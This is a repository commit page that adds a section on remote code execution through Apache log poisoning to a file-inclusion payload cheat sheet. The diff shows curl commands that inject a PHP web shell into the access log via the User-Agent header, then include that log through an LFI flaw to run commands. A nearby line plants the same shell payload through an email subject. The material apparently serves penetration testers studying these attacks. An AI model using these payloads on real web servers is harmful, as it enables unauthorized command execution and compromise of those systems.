ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #362 from noraj/patch-1

Browse Source 
add RCE via Apache logs in log poisoning
This commit is contained in:
Swissky 2021-05-10 13:13:34 +02:00 committed by GitHub
commit 4ae6982f63
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
File Inclusion/README.md
View File

@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line.
mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
``` ```
### RCE via Apache logs
Poison the User-Agent in access logs:
```
$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
```
Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
Then request the logs via the LFI and execute your command.
```
$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
```
## LFI to RCE via PHP sessions ## LFI to RCE via PHP sessions
Check if the website use PHP Session (PHPSESSID) Check if the website use PHP Session (PHPSESSID)